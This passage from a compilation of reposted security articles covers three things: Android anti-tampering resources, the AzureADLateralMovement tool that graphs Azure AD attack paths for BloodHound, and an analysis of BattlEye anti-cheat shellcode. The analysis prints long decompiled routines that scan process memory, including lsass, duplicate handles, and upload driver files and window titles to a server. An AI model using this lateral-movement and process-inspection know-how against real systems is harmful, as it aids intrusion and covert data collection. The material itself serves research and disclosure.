5. https://github.com/tyranid/oleviewdotnet
6. https://docs.microsoft.com/en-us/windows/win32/search/-search-sample-crawlscopecommandline

Sursa: http://blog.diffense.co.kr/2020/03/26/SearchIndexer.html
-
Protecting your Android App against Reverse Engineering and Tampering

Avi Parshan
Apr 2 · 4 min read

I built a premium (paid) Android app that has been cracked and modded. Therefore, I started researching ways to secure my code and make it more difficult to modify my app. Before I continue: you cannot completely prevent people from breaking your app. All you can do is make it slightly more difficult to get in and understand your code. I wrote this article because I felt that the only sources of information just said that it was nearly impossible to protect your app, and to just not leave secrets on the client device. That is partly true, but I wanted to compile sources that can actually assist independent developers like me. Lastly, when you search "android reverse engineer", all the results are about cracking other people's apps; there are almost no sources on how to protect your own apps. So here are some useful blogs and libraries which have helped me make my code more tamper-resistant. Several less popular sources have been included in the list below to help you! This article is geared towards new Android developers or ones who haven't really dealt with reverse engineering and mods before.

Proguard: This is built into Android Studio and serves several purposes. The first one is code obfuscation, basically turning your code into gibberish to make it difficult to understand. This can easily be beaten, but it is super simple to add to your app, so I still recommend implementing it. The second function is code shrinking, which is still relevant to this article: basically, it removes unused resources and code. I wouldn't rely on this, but it is included by default and worth implementing. The only way of actually checking if it changed anything is by reverse engineering your own APK.

Dexguard: A tool that isn't free, but made by the same team as Proguard. I haven't used it myself, so I can't recommend it. It includes everything that Proguard has and adds more features. Some notable additions are string and resource encryption.

Android NDK: Writing parts of your app in native code (C or C++) will certainly deter people from reverse engineering your app. There are several downsides to using the NDK, such as performance issues when making JNI calls, and you can introduce potential bugs down the line that will be harder to track. You'll also have to do the memory management yourself, which isn't trivial for beginners.

PiracyChecker: A popular library on GitHub with some basic ways to mitigate reverse engineering. I included this in one of my apps, but it has already been cracked. There are multiple checks you can run, including an implementation of the Google Play Licensing check (LVL). This is open source, so you can look at the code and contribute too! I am using Google Play App Signing, so I couldn't actually use the APK signature to verify that I signed the app, or even that Google did ;(
github.com/javiersantos/PiracyChecker

Google's SafetyNet Attestation API: This is an amazing option, though I haven't tested it thoroughly. Basically, you call Google's attestation API and they can tell you whether the device the app is running on is secure or not, for instance if it is rooted or using LuckyPatcher.

Deguard: This is a website that I stumbled upon. You upload an APK file, then it uses some algorithms to reverse what Proguard does.
Now you can open classes, sometimes with full class names too! I used this to pull some modded versions of my app and see, more or less, what had been changed. There are manual processes to achieve similar results, but this is faster and requires less work.
http://apk-deguard.com/

Android Anti-Reversing Defenses: This blog post explains some great defenses to put up against hackers/reverse engineering. I suggest reading it and implementing at least one or two of the methods used. There are code snippets too! For instance, detection code often looks for binaries that are usually installed once a device has been rooted.
mobile-security.gitbook.io

Android Security: Adding Tampering Detection to Your App: Another great article, also with code snippets, about how to protect your app. This piece also includes great explanations of how each method works.
https://www.airpair.com/android/posts/adding-tampering-detection-to-your-android-app

MobSF: I heard about this from an Android reverse engineering talk I was watching on YouTube; they mentioned this amazing tool in passing. I had never heard of it before, but decided to go ahead and test it out. It works on Windows, Linux, and Mac. In short, you run this locally, upload an APK (no AABs yet), and it analyses it for vulnerabilities. It performs basic checks and shows you a lot of information about an APK, like who signed the cert, app permissions, all the strings, and much more! I had some issues installing it, but the docs are good and they have a Slack channel, which came in handy.
https://github.com/MobSF/Mobile-Security-Framework-MobSF

Overall, there are several ways to make your app more difficult to crack. I'd recommend that your app call an API rather than do the checks locally; it is much easier to modify code on the client than on the server. Let me know if I missed anything, and if you have more ideas! If you found this article useful, consider buying me a coffee!

Sursa: https://medium.com/avi-parshan-studios/protecting-your-android-app-against-reverse-engineering-and-tampering-a727768b2e9e
-
What is AzureADLateralMovement

AzureADLateralMovement allows building a lateral movement graph for Azure Active Directory entities - Users, Computers, Groups and Roles. Using the Microsoft Graph API, AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data compatible with BloodHound 2.2.0.

Some of the implemented features are:

- Extraction of Users, Computers, Groups, Roles and more
- Transforming the entities into graph objects
- Injecting the objects into an Azure CosmosDB graph

Explanation: Terry Jeffords is a member of Device Administrators. This group is admin on all the AAD-joined machines, including Desktop-RGR29LI, where the user Amy Santiago has logged in within the last 2 hours and probably still has a session. This attack path can be exploited manually or by automated tools.

Architecture

The toolkit consists of several components:

MicrosoftGraphApi Helper - responsible for retrieving the required data from the Graph API
BloodHound Helper - responsible for creating json files that can be dropped into BloodHound 2.2.0 to extend the organization's covered entities
CosmosDbGraph Helper - in case you prefer using the Azure CosmosDB service instead of the BloodHound client, this module pushes the retrieved data into a graph database service

How to set up

Steps:
1. Download, compile and run
2. Browse to http://localhost:44302
3. Log on with an AAD administrative account
4. Click on "AzureActiveDirectoryLateralMovement" to retrieve data
5. Drag the json file into BloodHound 2.2.0

Configuration

An example configuration is below:

{
  "AzureAd": {
    "CallbackPath": "/signin-oidc",
    "BaseUrl": "https://localhost:44334",
    "Scopes": "Directory.Read.All AuditLog.Read.All",
    "ClientId": "<ClientId>",
    "ClientSecret": "<ClientSecret>",
    "GraphResourceId": "https://graph.microsoft.com/",
    "GraphScopes": "Directory.Read.All AuditLog.Read.All"
  },
  "Logging": {
    "IncludeScopes": false,
    "LogLevel": {
      "Default": "Warning"
    }
  },
  "CosmosDb": {
    "EndpointUrl": "https://<CosmosDbGraphName>.documents.azure.com:443/",
    "AuthorizationKey": "<AuthorizationKey>"
  }
}

Deployment

Before you start using this tool you need to create an application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application. After creating the application, copy the Application ID and change it in AzureOauth.config. The URL (external listener) that will be used for the application should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL. The Redirect URL should be the URL that will be used to host the application endpoint, in this case https://localhost:44302/. Make sure to check both of the boxes as shown below:

Security Considerations

The lateral movement graph allows investigating the attack paths truly available in the AAD environment. The graph consists of nodes for Users, Groups and Devices, with edges connecting them by the logic of "AdminTo", "MemberOf" and "HasSession". This logic is explained in detail by the original research document: https://github.com/BloodHoundAD/Bloodhound/wiki

In the on-premise environment, BloodHound collects data using the SAMR and SMB protocols against each machine in the domain, and LDAP against the on-premise AD. In an Azure AD environment, the relevant data regarding Azure AD devices, users and logon sessions can be retrieved using the Microsoft Graph API.
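For reference, the kind of Graph queries involved might look like the following. This is a hedged sketch using documented Graph v1.0 REST endpoints that match the Directory.Read.All/AuditLog.Read.All scopes from the configuration; the project's actual C# calls may differ:

// Illustrative Microsoft Graph v1.0 queries for the entities described above.
// `accessToken` is assumed to be an OAuth2 token carrying the configured scopes.
async function collect(accessToken) {
  const endpoints = [
    'https://graph.microsoft.com/v1.0/devices',          // AAD-joined devices
    'https://graph.microsoft.com/v1.0/users',            // users
    'https://graph.microsoft.com/v1.0/groups',           // groups (members fetched per group)
    'https://graph.microsoft.com/v1.0/directoryRoles',   // roles (members fetched per role)
    'https://graph.microsoft.com/v1.0/auditLogs/signIns' // sign-in events => sessions
  ];
  for (const url of endpoints) {
    const res = await fetch(url, {
      headers: { Authorization: 'Bearer ' + accessToken }
    });
    console.log(url, await res.json());
  }
}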
Once the relevant data is gathered it is possible to build a similar graph of connections for users, groups and Windows machines registered in the Azure Active Directory. To retrieve the data and build the graph data this project uses:

- An Azure app
- Microsoft Graph API
- A hybrid AD+AAD domain environment synced using pass-through authentication
- The BloodHound UI and entity objects

The AAD graph is based on the following data:

Devices - AAD-joined Windows devices only, and their owners
Users - All AD or AAD users
Administrative roles and Groups - All memberships of roles and groups
Local Admin - The following are default local admins on an AAD-joined device:
  - Global administrator role
  - Device administrator role
  - The owner of the machine
Sessions - All logins for Windows machines

References

Exploring graph queries on top of Azure Cosmos DB with Gremlin
https://github.com/talmaor/GraphExplorer
SharpHound - The C# Ingestor
https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector
Quickstart: Build a .NET Framework or Core application using the Azure Cosmos DB Gremlin API account
https://docs.microsoft.com/en-us/azure/cosmos-db/create-graph-dotnet
How to: Use the portal to create an Azure AD application and service principal that can access resources
https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal

Sursa: https://github.com/talmaor/AzureADLateralMovement
-
Mar 31, 2020 :: vmcall :: [ battleye, anti-cheats, game-hacking ]

BattlEye reverse engineer tracking

Preface

Modern commercial anti-cheats face increasing competitiveness from professional game-hack production, and have thus begun implementing questionable methods to counter it. In this article, we will present a previously unknown anti-cheat module, pushed to a small fraction of the player base by the commercial anti-cheat BattlEye. The prevalent theory is that this module is specifically targeted against reverse engineers, to monitor the production of video game hacking tools, due to the fact that it is dynamically pushed.

[1] Shellcode refers to independent code that is dynamically loaded into a running process.

The code snippets in this article are beautified decompilations of shellcode [1] that we've dumped and deobfuscated from BattlEye. The shellcode was pushed to my development machine while messing around in Escape from Tarkov. On this machine various reverse engineering applications such as x64dbg are installed and frequently running, which might've caught the attention of the anti-cheat in question. To confirm the suspicion, a secondary machine that is mainly used for testing was booted, and on it, Escape from Tarkov was installed. The shellcode in question was not pushed to the secondary machine, which runs on the same network and utilized the same game account as the development machine. Other members of Secret Club have experienced the same ordeal, and the common denominator here is that we're all highly specialized reverse engineers, which means most have the same applications installed. To put a nail in the coffin, I asked a few of my fellow high school classmates to let me log shellcode activity (using a hypervisor) on their machines while playing Escape from Tarkov, and not a single one of them received the module in question. Needless to say, some kind of technical minority is being targeted, as the following code segments will show.

Context

In this article, you will see references to a function called battleye::send. This function is used by the commercial anti-cheat to send information from the client module BEClient_x64/x86.dll inside of the game process to the respective game server. This is to be interpreted as a pure "send data over the internet" function, and only takes a buffer as input. The ID in each report header determines the type of "packet", which can be used to distinguish packets from one another.

Device driver enumeration

This routine has two main purposes: enumerating device drivers and installed certificates used by the respective device drivers. The former has a somewhat surprising twist, though: this shellcode will upload any device driver(!!) matching the arbitrary "evil" filter to the game server. This means that if your proprietary, top-secret and completely unrelated device driver has the word "Callback" in it, the shellcode will upload the entire contents of the file on disk. This is a privacy concern, as it is a relatively commonly used word for device drivers that install kernel callbacks for monitoring events.
The certificate enumerator sends the contents of all certificates used by device drivers on your machine directly to the game server: // ONLY ENUMERATE ON X64 MACHINES GetNativeSystemInfo(&native_system_info); if ( native_system_info.u.s.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ) { if ( EnumDeviceDrivers(device_list, 0x2000, &required_size) ) { if ( required_size <= 0x2000u ) { report_buffer = (__int8 *)malloc(0x7530); report_buffer[0] = 0; report_buffer[1] = 0xD; buffer_index = 2; // DISABLE FILESYSTEM REDIRECTION IF RUN IN WOW64 if ( Wow64EnableWow64FsRedirection ) Wow64EnableWow64FsRedirection(0); // ITERATE DEVICE DRIVERS for ( device_index = 0; ; ++device_index ) { if ( device_index >= required_size / 8u /* MAX COUNT*/ ) break; // QUERY DEVICE DRIVER FILE NAME driver_file_name_length = GetDeviceDriverFileNameA( device_list[device_index], &report_buffer[buffer_index + 1], 0x100); report_buffer[buffer_index] = driver_file_name_length; // IF QUERY DIDN'T FAIL if ( driver_file_name_length ) { // CACHE NAME BUFFER INDEX FOR LATER USAGE name_buffer_index = buffer_index; // OPEN DEVICE DRIVER FILE HANDLE device_driver_file_handle = CreateFileA( &report_buffer[buffer_index + 1], GENERIC_READ, FILE_SHARE_READ, 0, 3, 0, 0); if ( device_driver_file_handle != INVALID_HANDLE_VALUE ) { // CONVERT DRIVER NAME MultiByteToWideChar( 0, 0, &report_buffer[buffer_index + 1], 0xFFFFFFFF, &widechar_buffer, 0x100); } after_device_driver_file_name_index = buffer_index + report_buffer[buffer_index] + 1; // QUERY DEVICE DRIVER FILE SIZE *(_DWORD *)&report_buffer[after_device_driver_file_name_index] = GetFileSize(device_driver_file_handle, 0); after_device_driver_file_name_index += 4; report_buffer[after_device_driver_file_name_index] = 0; buffer_index = after_device_driver_file_name_index + 1; CloseHandle(device_driver_file_handle); // IF FILE EXISTS ON DISK if ( device_driver_file_handle != INVALID_HANDLE_VALUE ) { // QUERY DEVICE DRIVER CERTIFICATE if ( CryptQueryObject( 1, &widechar_buffer, CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED, CERT_QUERY_FORMAT_FLAG_BINARY, 0, &msg_and_encoding_type, &content_type, &format_type, &cert_store, &msg_handle, 1) ) { // QUERY SIGNER INFORMATION SIZE if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, 0, &signer_info_size) ) { signer_info = (CMSG_SIGNER_INFO *)malloc(signer_info_size); if ( signer_info ) { // QUERY SIGNER INFORMATION if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, signer_info, &signer_info_size) ) { qmemcpy(&issuer, &signer_info->Issuer, sizeof(issuer)); qmemcpy(&serial_number, &signer_info->SerialNumber, sizeof(serial_number)); cert_ctx = CertFindCertificateInStore( cert_store, X509_ASN_ENCODING|PKCS_7_ASN_ENCODING, 0, CERT_FIND_SUBJECT_CERT, &certificate_information, 0); if ( cert_ctx ) { // QUERY CERTIFICATE NAME cert_name_length = CertGetNameStringA( cert_ctx, CERT_NAME_SIMPLE_DISPLAY_TYPE, 0, 0, &report_buffer[buffer_index], 0x100); report_buffer[buffer_index - 1] = cert_name_length; if ( cert_name_length ) { report_buffer[buffer_index - 1] -= 1; buffer_index += character_length; } // FREE CERTIFICATE CONTEXT CertFreeCertificateContext(cert_ctx); } } free(signer_info); } } // FREE CERTIFICATE STORE HANDLE CertCloseStore(cert_store, 0); CryptMsgClose(msg_handle); } // DUMP ANY DRIVER NAMED "Callback????????????" where ? 
is a wildcard
if ( *(_DWORD *)&report_buffer[name_buffer_index - 0x11 + report_buffer[name_buffer_index]] == 'llaC'
  && *(_DWORD *)&report_buffer[name_buffer_index - 0xD + report_buffer[name_buffer_index]] == 'kcab'
  && (unsigned __int64)suspicious_driver_count < 2 )
{
  // OPEN HANDLE ON DISK
  file_handle = CreateFileA(&report_buffer[name_buffer_index + 1], 0x80000000, 1, 0, 3, 128, 0);
  if ( file_handle != INVALID_HANDLE_VALUE )
  {
    // INITIATE RAW DATA DUMP
    raw_packet_header.pad = 0;
    raw_packet_header.id = 0xBEu;
    battleye::send(&raw_packet_header, 2, 0);
    // READ DEVICE DRIVER CONTENTS IN CHUNKS OF 0x27EA (WHY?)
    while ( ReadFile(file_handle, &raw_packet_header.buffer, 0x27EA, &size, 0x00) && size )
    {
      raw_packet_header.pad = 0;
      raw_packet_header.id = 0xBEu;
      battleye::send(&raw_packet_header, (unsigned int)(size + 2), 0);
    }
    CloseHandle(file_handle);
  }
} } } } }
// ENABLE FILESYSTEM REDIRECTION
if ( Wow64EnableWow64FsRedirection )
{
  Wow64EnableWow64FsRedirection(1, required_size % 8u);
}
// SEND DUMP
battleye::send(report_buffer, buffer_index, 0);
free(report_buffer);
} } }

Window enumeration

This routine enumerates all visible windows on your computer. Each visible window will have its title dumped and uploaded to the server together with the window class and style. If this shellcode is pushed while you have a Google Chrome tab open in the background with confidential information regarding your divorce, BattlEye now knows about this, too bad. While this is probably a really great method to monitor the activities of cheaters, it's a very aggressive approach and probably yields a ton of inappropriate information, which will be sent to the game server over the internet. No window is safe from being dumped, so be careful when you load up your favorite shooter game. The decompilation is as follows:

top_window_handle = GetTopWindow(0x00);
if ( top_window_handle )
{
  report_buffer = (std::uint8_t*)malloc(0x5000);
  report_buffer[0] = 0;
  report_buffer[1] = 0xC;
  buffer_index = 2;
  do
  {
    // FILTER VISIBLE WINDOWS
    if ( GetWindowLongA(top_window_handle, GWL_STYLE) & WS_VISIBLE )
    {
      // QUERY WINDOW TEXT
      window_text_length = GetWindowTextA(top_window_handle, &report_buffer[buffer_index + 1], 0x40);
      for ( i = 0; i < window_text_length; ++i )
        report_buffer[buffer_index + 1 + i] = 0x78;
      report_buffer[buffer_index] = window_text_length;
      // QUERY WINDOW CLASS NAME
      after_name_index = buffer_index + (char)window_text_length + 1;
      class_name_length = GetClassNameA(top_window_handle, &report_buffer[after_name_index + 1], 0x40);
      report_buffer[after_name_index] = class_name_length;
      after_class_index = after_name_index + (char)class_name_length + 1;
      // QUERY WINDOW STYLE
      window_style = GetWindowLongA(top_window_handle, GWL_STYLE);
      extended_window_style = GetWindowLongA(top_window_handle, GWL_EXSTYLE);
      *(_DWORD *)&report_buffer[after_class_index] = extended_window_style | window_style;
      // QUERY WINDOW OWNER PROCESS ID
      GetWindowThreadProcessId(top_window_handle, &window_pid);
      *(_DWORD *)&report_buffer[after_class_index + 4] = window_pid;
      buffer_index = after_class_index + 8;
    }
    top_window_handle = GetWindow(top_window_handle, GW_HWNDNEXT);
  } while ( top_window_handle && buffer_index <= 0x4F40 );
  battleye::send(report_buffer, buffer_index, false);
  free(report_buffer);
}

Shellcode detection

[2] Manually mapping an executable is the process of replicating the Windows image loader.

Another mechanism of this proprietary shellcode is the complete address space enumeration done on all running processes.
This enumeration routine checks for memory anomalies frequently seen in shellcode and manually mapped portable executables [2]. This is done by enumerating all processes and their respective threads. By checking the start address of each thread and cross-referencing this to known module address ranges, it is possible to deduce which threads were used to execute dynamically allocated shellcode. When such an anomaly is found, the thread start address, thread handle, thread index and thread creation time are all sent to the respective game server for further investigation. This is likely done because allocating code into a trusted process yields increased stealth. This method kind of mitigates it as shellcode stands out if you start threads directly for them. This would not catch anyone using a method such as thread hijacking for shellcode execution, which is an alternative method. The decompilation is as follows: query_buffer_size = 0x150; while ( 1 ) { // QUERY PROCESS LIST query_buffer_size += 0x400; query_buffer = (SYSTEM_PROCESS_INFORMATION *)realloc(query_buffer, query_buffer_size); if ( !query_buffer ) break; query_status = NtQuerySystemInformation( SystemProcessInformation, query_buffer, query_buffer_size, &query_buffer_size); if ( query_status != STATUS_INFO_LENGTH_MISMATCH ) { if ( query_status >= 0 ) { // QUERY MODULE LIST SIZE module_list_size = 0; NtQuerySystemInformation)(SystemModuleInformation, &module_list_size, 0, &module_list_size); modules_buffer = (RTL_PROCESS_MODULES *)realloc(0, module_list_size); if ( modules_buffer ) { // QUERY MODULE LIST if ( NtQuerySystemInformation)( SystemModuleInformation, modules_buffer, module_list_size, 1) >= 0 ) { for ( current_process_entry = query_buffer; current_process_entry->UniqueProcessId != GAME_PROCESS_ID; current_process_entry = (std::uint64_t)current_process_entry + current_process_entry->NextEntryOffset) ) { if ( !current_process_entry->NextEntryOffset ) goto STOP_PROCESS_ITERATION_LABEL; } for ( thread_index = 0; thread_index < current_process_entry->NumberOfThreads; ++thread_index ) { // CHECK IF THREAD IS INSIDE OF ANY KNOWN MODULE for ( module_count = 0; module_count < modules_buffer->NumberOfModules && current_process_entry->threads[thread_index].StartAddress < modules_buffer->Modules[module_count].ImageBase || current_process_entry->threads[thread_index].StartAddress >= (char *)modules_buffer->Modules[module_count].ImageBase + modules_buffer->Modules[module_count].ImageSize); ++module_count ) { ; } if ( module_count == modules_buffer->NumberOfModules )// IF NOT INSIDE OF ANY MODULES, DUMP { // SEND A REPORT ! 
thread_report.pad = 0;
thread_report.id = 0xF;
thread_report.thread_base_address = current_process_entry->threads[thread_index].StartAddress;
thread_report.thread_handle = current_process_entry->threads[thread_index].ClientId.UniqueThread;
thread_report.thread_index = current_process_entry->NumberOfThreads - (thread_index + 1);
thread_report.create_time = current_process_entry->threads[thread_index].CreateTime - current_process_entry->CreateTime;
thread_report.windows_directory_delta = nullptr;
if ( GetWindowsDirectoryA(&directory_path, 0x80) )
{
  windows_directory_handle = CreateFileA(&directory_path, GENERIC_READ, 7, 0, 3, 0x2000000, 0);
  if ( windows_directory_handle != INVALID_HANDLE_VALUE )
  {
    if ( GetFileTime(windows_directory_handle, 0, 0, &last_write_time) )
      thread_report.windows_directory_delta = last_write_time - current_process_entry->threads[thread_index].CreateTime;
    CloseHandle(windows_directory_handle);
  }
}
thread_report.driver_folder_delta = nullptr;
system_directory_length = GetSystemDirectoryA(&directory_path, 128);
if ( system_directory_length )
{
  // Append \Drivers
  std::memcpy(&directory_path + system_directory_length, "\\Drivers", 9);
  driver_folder_handle = CreateFileA(&directory_path, GENERIC_READ, 7, 0, 3, 0x2000000, 0);
  if ( driver_folder_handle != INVALID_HANDLE_VALUE )
  {
    if ( GetFileTime(driver_folder_handle, 0, 0, &drivers_folder_last_write_time) )
      thread_report.driver_folder_delta = drivers_folder_last_write_time - current_process_entry->threads[thread_index].CreateTime;
    CloseHandle(driver_folder_handle);
  }
}
battleye::send(&thread_report.pad, 0x2A, 0);
} } }
STOP_PROCESS_ITERATION_LABEL:
free(modules_buffer);
} free(query_buffer); } break; } }

Shellcode dumping

The shellcode will also scan the game process and the Windows process lsass.exe for suspicious memory allocations. While the previous memory scan looks for general thread-creation abnormalities across all processes, this one focuses on specific scenarios and even includes a memory region size whitelist, which should be quite trivial to abuse.

[3] The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirtualAlloc, the memory manager creates an entry in the VAD tree. (Source)

The game and lsass process are scanned for executable memory outside of known modules by checking the Type field in MEMORY_BASIC_INFORMATION. This field will be MEM_IMAGE if the memory section is mapped properly by the Windows image loader (Ldr), whereas it will be MEM_PRIVATE or MEM_MAPPED if allocated by other means. This is actually the proper way to detect shellcode and was implemented in my project MapDetection over three years ago. Thankfully, anti-cheats are now up to speed.

After this scan is done, a game-specific check has been added which caught my attention. The shellcode will spam IsBadReadPtr on reserved and freed memory, which should always return true, as there would normally not be any readable memory in these sections. This aims to catch cheaters manually modifying the virtual address descriptor [3] to hide their memory from the anti-cheat. While this is actually a good idea in theory, this kind of spamming is going to hurt performance, and IsBadReadPtr is very simple to hook.

for ( search_index = 0; ; ++search_index ) { search_count = lsass_handle ?
2 : 1; if ( search_index >= search_count ) break; // SEARCH CURRENT PROCESS BEFORE LSASS if ( search_index ) current_process = lsass_handle; else current_process = -1; // ITERATE ENTIRE ADDRESS SPACE OF PROCESS for ( current_address = 0; NtQueryVirtualMemory)( current_process, current_address, 0, &mem_info, sizeof(mem_info), &used_length) >= 0; current_address = (char *)mem_info.BaseAddress + mem_info.RegionSize ) { // FIND ANY EXECUTABLE MEMORY THAT DOES NOT BELONG TO A MODULE if ( mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_EXECUTE || mem_info.Protect == PAGE_EXECUTE_READ || mem_info.Protect == PAGE_EXECUTE_READWRITE) && (mem_info.Type == MEM_PRIVATE || mem_info.Type == MEM_MAPPED) && (mem_info.BaseAddress > SHELLCODE_ADDRESS || mem_info.BaseAddress + mem_info.RegionSize <= SHELLCODE_ADDRESS) ) { report.pad = 0; report.id = 0x10; report.base_address = (__int64)mem_info.BaseAddress; report.region_size = mem_info.RegionSize; report.meta = mem_info.Type | mem_info.Protect | mem_info.State; battleye::send(&report, sizeof(report), 0); if ( !search_index && (mem_info.RegionSize != 0x12000 && mem_info.RegionSize >= 0x11000 && mem_info.RegionSize <= 0x500000 || mem_info.RegionSize == 0x9000 || mem_info.RegionSize == 0x7000 || mem_info.RegionSize >= 0x2000 && mem_info.RegionSize <= 0xF000 && mem_info.Protect == PAGE_EXECUTE_READ)) { // INITIATE RAW DATA PACKET report.pad = 0; report.id = 0xBE; battleye::send(&report, sizeof(report), false); // DUMP SHELLCODE IN CHUNKS OF 0x27EA (WHY?) for ( chunk_index = 0; ; ++chunk_index ) { if ( chunk_index >= mem_info.region_size / 0x27EA + 1 ) break; buffer_size = chunk_index >= mem_info.region_size / 0x27EA ? mem_info.region_size % 0x27EA : 0x27EA; if ( NtReadVirtualMemory(current_process, mem_info.base_address, &report.buffer, buffer_size, 0x00) < 0 ) break; report.pad = 0; report.id = 0xBEu; battleye::send(&v313, buffer_size + 2, false); } } } // TRY TO FIND DKOM'D MEMORY IN LOCAL PROCESS if ( !search_index && (mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_NOACCESS || !mem_info.Protect) || mem_info.State == MEM_FREE || mem_info.State == MEM_RESERVE) ) { toggle = 0; for ( scan_address = current_address; scan_address < (char *)mem_info.BaseAddress + mem_info.RegionSize && scan_address < (char *)mem_info.BaseAddress + 0x40000000; scan_address += 0x20000 ) { if ( !IsBadReadPtr(scan_address, 1) && NtQueryVirtualMemory(GetCurrentProcess(), scan_address, 0, &local_mem_info, sizeof(local_mem_info), &used_length) >= 0 && local_mem_info.State == mem_info.State && (local_mem_info.State != 4096 || local_mem_info.Protect == mem_info.Protect) ) { if ( !toggle ) { report.pad = 0; report.id = 0x10; report.base_address = mem_info.BaseAddress; report.region_size = mem_info.RegionSize; report.meta = mem_info.Type | mem_info.Protect | mem_info.State; battleye::send(&report, sizeof(report), 0); toggle = 1; } report.pad = 0; report.id = 0x10; report.base_address = local_mem_info.BaseAddress; report.region_size = local_mem_info.RegionSize; report.meta = local_mem_info.Type | local_mem_info.Protect | local_mem_info.State; battleye::send(&local_mem_info, sizeof(report), 0); } } } } } Handle enumeration This mechanism will enumerate all open handles on the machine and flag any game process handles. This is done to catch cheaters forcing their handles to have a certain level of access that is not normally obtainable, as the anti-cheat registers callbacks to prevent processes from gaining memory-modification rights of the game process. 
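For background, stripping handle access like this is typically done from a kernel driver with an object callback. Below is a minimal C sketch of the standard mechanism, using the documented ObRegisterCallbacks API; this is an illustration of the general technique, not BattlEye's actual code, and g_protectedProcess plus the altitude string are assumptions:

#include <ntddk.h>

#ifndef PROCESS_VM_READ
#define PROCESS_VM_OPERATION 0x0008
#define PROCESS_VM_READ      0x0010
#define PROCESS_VM_WRITE     0x0020
#endif

static PVOID     g_obHandle;
static PEPROCESS g_protectedProcess; // the game process to protect (assumed global)

// Pre-operation callback: strip memory-access rights from new/duplicated handles.
static OB_PREOP_CALLBACK_STATUS PreOpCallback(PVOID ctx, POB_PRE_OPERATION_INFORMATION info)
{
    UNREFERENCED_PARAMETER(ctx);
    if ( info->ObjectType == *PsProcessType && (PEPROCESS)info->Object == g_protectedProcess )
    {
        ACCESS_MASK deny = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION;
        if ( info->Operation == OB_OPERATION_HANDLE_CREATE )
            info->Parameters->CreateHandleInformation.DesiredAccess &= ~deny;
        else
            info->Parameters->DuplicateHandleInformation.DesiredAccess &= ~deny;
    }
    return OB_PREOP_SUCCESS;
}

NTSTATUS RegisterHandleProtection(VOID)
{
    OB_OPERATION_REGISTRATION op = { 0 };
    OB_CALLBACK_REGISTRATION  reg = { 0 };

    op.ObjectType   = PsProcessType;
    op.Operations   = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
    op.PreOperation = PreOpCallback;

    reg.Version                    = OB_FLT_REGISTRATION_VERSION;
    reg.OperationRegistrationCount = 1;
    reg.OperationRegistration      = &op;
    RtlInitUnicodeString(&reg.Altitude, L"321000"); // arbitrary example altitude

    return ObRegisterCallbacks(&reg, &g_obHandle);
}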
If a process is caught with an open handle to the game process, relevant info, such as level of access and process name, is sent to the game server: report_buffer = (__int8 *)malloc(0x2800); report_buffer[0] = 0; report_buffer[1] = 0x11; buffer_index = 2; handle_info = 0; buffer_size = 0x20; do { buffer_size += 0x400; handle_info = (SYSTEM_HANDLE_INFORMATION *)realloc(handle_info, buffer_size); if ( !handle_info ) break; query_status = NtQuerySystemInformation(0x10, handle_info, buffer_size, &buffer_size);// SystemHandleInformation } while ( query_status == STATUS_INFO_LENGTH_MISMATCH ); if ( handle_info && query_status >= 0 ) { process_object_type_index = -1; for ( handle_index = 0; (unsigned int)handle_index < handle_info->number_of_handles && buffer_index <= 10107; ++handle_index ) { // ONLY FILTER PROCESS HANDLES if ( process_object_type_index == -1 || (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex == process_object_type_index ) { // SEE IF OWNING PROCESS IS NOT GAME PROCESS if ( handle_info->handles[handle_index].UniqueProcessId != GetCurrentProcessId() ) { process_handle = OpenProcess( PROCESS_DUP_HANDLE, 0, *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId); if ( process_handle ) { // DUPLICATE THEIR HANDLE current_process_handle = GetCurrentProcess(); if ( DuplicateHandle( process_handle, (unsigned __int16)handle_info->handles[handle_index].HandleValue, current_process_handle, &duplicated_handle, PROCESS_QUERY_LIMITED_INFORMATION, 0, 0) ) { if ( process_object_type_index == -1 ) { if ( NtQueryObject(duplicated_handle, ObjectTypeInformation, &typeinfo, 0x400, 0) >= 0 && !_wcsnicmp(typeinfo.Buffer, "Process", typeinfo.Length / 2) ) { process_object_type_index = (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex; } } if ( process_object_type_index != -1 ) { // DUMP OWNING PROCESS NAME target_process_id = GetProcessId(duplicated_handle); if ( target_process_id == GetCurrentProcessId() ) { if ( handle_info->handles[handle_index].GrantedAccess & PROCESS_VM_READ|PROCESS_VM_WRITE ) { owning_process = OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION, 0, *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId); process_name_length = 0x80; if ( !owning_process || !QueryFullProcessImageNameA( owning_process, 0, &report_buffer[buffer_index + 1], &process_name_length) ) { process_name_length = 0; } if ( owning_process ) CloseHandle(owning_process); report_buffer[buffer_index] = process_name_length; after_name_index = buffer_index + (char)process_name_length + 1; *(_DWORD *)&report_buffer[after_name_index] = handle_info->handles[handle_index].GrantedAccess; buffer_index = after_name_index + 4; } } } CloseHandle(duplicated_handle); CloseHandle(process_handle); } else { CloseHandle(process_handle); } } } } } } if ( handle_info ) free(handle_info); battleye::send(report_buffer, buffer_index, false); free(report_buffer); Process enumeration The first routine the shellcode implements is a catch-all function for logging and dumping information about all running processes. This is fairly common, but is included in the article for completeness’ sake. This also uploads the file size of the primary image on disk. 
